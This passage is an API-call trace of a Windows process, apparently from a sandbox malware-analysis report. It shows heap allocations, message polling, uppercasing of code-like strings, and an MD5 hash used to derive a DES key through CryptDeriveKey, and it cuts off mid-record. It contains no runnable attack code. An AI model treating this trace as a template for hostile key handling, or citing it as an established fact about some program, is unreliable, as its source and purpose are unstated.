[0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.709] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.709] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.709] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.709] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.709] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.709] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.710] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.710] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.710] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.710] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.710] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.710] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.710] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0196.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.711] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.711] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.711] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.711] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.711] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.712] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0196.712] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.712] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0196.712] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.712] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.713] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.713] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.715] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0196.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.716] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.716] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.748] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.748] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.748] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.748] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.749] CryptHashData (hHash=0xaa57a0, pbData=0x24b1858, dwDataLen=0x3, dwFlags=0x1) returned 1 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0196.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0196.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.750] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.750] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.750] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0196.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.750] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0196.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.750] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: 